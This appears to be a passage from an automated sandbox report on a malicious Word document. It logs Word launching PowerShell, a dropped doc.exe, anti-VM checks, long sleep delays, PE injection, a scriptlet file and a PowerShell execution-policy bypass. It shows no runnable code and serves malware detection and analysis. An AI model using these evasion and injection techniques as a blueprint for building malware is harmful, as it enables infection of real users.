Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\doc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000009.00000002.446591152.00000000023F3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.446479860.00000000023A1000.00000004.00000001.sdmp, type: MEMORY

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2416	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2200	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2916	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1928	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1832	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2544	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\doc.exe TID: 2828	Thread sleep time: -35727s >= -30000s
Source: C:\Users\user\AppData\Roaming\doc.exe TID: 2824	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\doc.exe TID: 2000	Thread sleep count: 60 > 30
Source: C:\Users\user\AppData\Roaming\doc.exe TID: 2804	Thread sleep time: -120000s >= -30000s

Source: C:\Users\user\AppData\Roaming\doc.exe

Code function: OpenSCManagerW,EnumServicesStatusExW,EnumServicesStatusExW,GetLastError,CloseServiceHandle,OpenSCManagerW,lstrcmpW,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\doc.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\doc.exe	Thread delayed: delay time: 35727
Source: C:\Users\user\AppData\Roaming\doc.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Roaming\doc.exe

Code function: 14_2_0041002B GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Source: powershell.exe, 00000005.00000002.429199796.00000000002AF000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 14_2_00409DF6 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 14_2_0040FF27 FindFirstFileW,FindNextFileW,

Source: C:\Users\user\AppData\Roaming\doc.exe

Code function: 14_2_0040FA42 LoadLibraryA,GetProcAddress,

Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 14_2_0041094E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 14_2_00419172 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 14_2_00410619 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\doc.exe	Code function: 14_2_00410620 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\AppData\Roaming\doc.exe

Code function: 14_2_00401085 GetProcessHeap,RtlAllocateHeap,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\doc.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\doc.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\doc.exe

Memory written: C:\Users\user\AppData\Roaming\doc.exe base: 400000 value starts with: 4D5A

Injects files into Windows application

Show sources

Source: C:\Windows\System32\notepad.exe

Injected file: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDh .ScT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Bypasses PowerShell execution policy

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

